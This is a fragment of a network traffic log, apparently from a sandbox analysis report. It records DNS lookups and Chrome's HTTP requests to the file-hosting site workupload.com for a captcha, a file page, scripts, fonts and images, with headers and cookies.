                                            Access-Control-Allow-Origin: https://workupload.com
                                            Access-Control-Allow-Credentials: true
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                          • flag-us
                                            DNS
                                            162.201.250.142.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            162.201.250.142.in-addr.arpa
                                            IN PTR
                                            Response
                                            162.201.250.142.in-addr.arpa
                                            IN PTR
                                            par21s23-in-f2.1e100.net
                                          • flag-us
                                            DNS
                                            www.google.com
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            www.google.com
                                            IN A
                                            Response
                                            www.google.com
                                            IN A
                                            172.217.20.196
                                          • flag-us
                                            DNS
                                            163.214.58.216.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            163.214.58.216.in-addr.arpa
                                            IN PTR
                                            Response
                                            163.214.58.216.in-addr.arpa
                                            IN PTR
                                            mad01s26-in-f3.1e100.net
                                            163.214.58.216.in-addr.arpa
                                            IN PTR
                                            mad01s26-in-f163.1e100.net
                                            163.214.58.216.in-addr.arpa
                                            IN PTR
                                            par10s42-in-f3.1e100.net
                                          • flag-us
                                            DNS
                                            42.215.58.216.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            42.215.58.216.in-addr.arpa
                                            IN PTR
                                            Response
                                            42.215.58.216.in-addr.arpa
                                            IN PTR
                                            par21s17-in-f10.1e100.net
                                          • flag-us
                                            DNS
                                            1.112.95.208.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            1.112.95.208.in-addr.arpa
                                            IN PTR
                                            Response
                                            1.112.95.208.in-addr.arpa
                                            IN PTR
                                            ip-api.com
                                          • flag-us
                                            DNS
                                            78.179.250.142.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            78.179.250.142.in-addr.arpa
                                            IN PTR
                                            Response
                                            78.179.250.142.in-addr.arpa
                                            IN PTR
                                            par21s19-in-f14.1e100.net
                                          • flag-us
                                            DNS
                                            53.130.130.94.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            53.130.130.94.in-addr.arpa
                                            IN PTR
                                            Response
                                            53.130.130.94.in-addr.arpa
                                            IN PTR
                                            static.53.130.130.94.clients.your-server.de
                                          • flag-us
                                            DNS
                                            www.gstatic.com
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            www.gstatic.com
                                            IN A
                                            Response
                                            www.gstatic.com
                                            IN A
                                            216.58.214.163
                                          • flag-us
                                            DNS
                                            142.178.250.142.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            142.178.250.142.in-addr.arpa
                                            IN PTR
                                            Response
                                            142.178.250.142.in-addr.arpa
                                            IN PTR
                                            par21s22-in-f14.1e100.net
                                          • flag-us
                                            DNS
                                            29.243.111.52.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            29.243.111.52.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            162.126.13.49.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            162.126.13.49.in-addr.arpa
                                            IN PTR
                                            Response
                                            162.126.13.49.in-addr.arpa
                                            IN PTR
                                            static.162.126.13.49.clients.your-server.de
                                          • flag-us
                                            DNS
                                            67.214.58.216.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            67.214.58.216.in-addr.arpa
                                            IN PTR
                                            Response
                                            67.214.58.216.in-addr.arpa
                                            IN PTR
                                            fra15s10-in-f67.1e100.net
                                            67.214.58.216.in-addr.arpa
                                            IN PTR
                                            fra15s10-in-f3.1e100.net
                                            67.214.58.216.in-addr.arpa
                                            IN PTR
                                            par10s39-in-f3.1e100.net
                                          • flag-us
                                            DNS
                                            content-autofill.googleapis.com
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            content-autofill.googleapis.com
                                            IN A
                                            Response
                                            content-autofill.googleapis.com
                                            IN A
                                            216.58.215.42
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.179.74
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.179.106
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.178.138
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.201.170
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.75.234
                                            content-autofill.googleapis.com
                                            IN A
                                            216.58.214.170
                                            content-autofill.googleapis.com
                                            IN A
                                            172.217.20.170
                                            content-autofill.googleapis.com
                                            IN A
                                            172.217.20.202
                                          • flag-us
                                            DNS
                                            174.20.217.172.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            174.20.217.172.in-addr.arpa
                                            IN PTR
                                            Response
                                            174.20.217.172.in-addr.arpa
                                            IN PTR
                                            par10s49-in-f14.1e100.net
                                            174.20.217.172.in-addr.arpa
                                            IN PTR
                                            waw02s07-in-f174.1e100.net
                                            174.20.217.172.in-addr.arpa
                                            IN PTR
                                            waw02s07-in-f14.1e100.net
                                          • flag-us
                                            DNS
                                            nexusrules.officeapps.live.com
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            nexusrules.officeapps.live.com
                                            IN A
                                            Response
                                            nexusrules.officeapps.live.com
                                            IN CNAME
                                            prod.nexusrules.live.com.akadns.net
                                            prod.nexusrules.live.com.akadns.net
                                            IN A
                                            52.111.243.29
                                          • flag-de
                                            POST
                                            https://workupload.com/captcha
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            POST /captcha HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            Content-Length: 22
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Accept: application/json, text/javascript, */*; q=0.01
                                            Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                            X-Requested-With: XMLHttpRequest
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Origin: https://workupload.com
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%226lFpElVSnJPd4zuGDnERJ08%5C%2FiG27r%5C%2FBAl6LmoDLdbSXzB%2BRMLU6N7D1Y39hZ7p%5C%2FpmMUSw%5C%2FJPYRAa4g9KLilVaFbmquQNxDUVOj%5C%2FoYrdHmyE9N5d7PMDi%5C%2FKgpFEGMzy0AUTOnm3JicitGzGCbd0o%2BowoL4SY%2BbPQxc9coy1g8ngs%3D%22%7D
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Set-Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; expires=Sat, 15-Jun-2024 06:57:05 GMT; Max-Age=2592000; path=/; domain=.workupload.com
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://workupload.com/file/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /file/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            Cache-Control: max-age=0
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-Dest: document
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Set-Cookie: token=dog3cr8m9coprihlvsgptlfoci; expires=Thu, 16-May-2024 12:57:05 GMT; Max-Age=21600; path=/; domain=.workupload.com; HttpOnly
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 2958
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://workupload.com/translations.js?en
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /translations.js?en HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Expires: Thu, 16 May 2024 07:57:05 GMT
                                            Pragma: cache
                                            Cache-Control: max-age=3600
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 19475
                                            Keep-Alive: timeout=5, max=98
                                            Connection: Keep-Alive
                                            Content-Type: application/javascript
                                          • flag-de
                                            GET
                                            https://workupload.com/favicon.ico
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /favicon.ico HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%226lFpElVSnJPd4zuGDnERJ08%5C%2FiG27r%5C%2FBAl6LmoDLdbSXzB%2BRMLU6N7D1Y39hZ7p%5C%2FpmMUSw%5C%2FJPYRAa4g9KLilVaFbmquQNxDUVOj%5C%2FoYrdHmyE9N5d7PMDi%5C%2FKgpFEGMzy0AUTOnm3JicitGzGCbd0o%2BowoL4SY%2BbPQxc9coy1g8ngs%3D%22%7D
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "18f1c-60e5f59ac54ec"
                                            Accept-Ranges: bytes
                                            Content-Length: 102172
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: image/vnd.microsoft.icon
                                          • flag-de
                                            GET
                                            https://workupload.com/js/39b9ad5.js?v=KUUBLA72
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /js/39b9ad5.js?v=KUUBLA72 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "59171-60e5f59ac742c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Transfer-Encoding: chunked
                                            Content-Type: application/javascript
                                          • flag-de
                                            GET
                                            https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /css/4280ebd.css?v=KUUBLA72 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: text/css,*/*;q=0.1
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: style
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Fri, 23 Feb 2024 14:17:19 GMT
                                            ETag: "34295-6120d37c4bb6c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Content-Length: 35970
                                            Keep-Alive: timeout=5, max=98
                                            Connection: Keep-Alive
                                            Content-Type: text/css
                                          • flag-de
                                            GET
                                            https://workupload.com/bundles/app/img/workupload_logo_small.svg
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /bundles/app/img/workupload_logo_small.svg HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "907-60e5f59ac454c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Content-Length: 1282
                                            Keep-Alive: timeout=5, max=97
                                            Connection: Keep-Alive
                                            Content-Type: image/svg+xml
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                          • flag-de
                                            GET
                                            https://workupload.com/qr/file/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /qr/file/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Transfer-Encoding: chunked
                                            Content-Type: image/png
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/fontawesome-webfont.woff2?v=4.7.0
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "12d68-60e5f59ac54ec"
                                            Accept-Ranges: bytes
                                            Content-Length: 77160
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: font/woff2
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
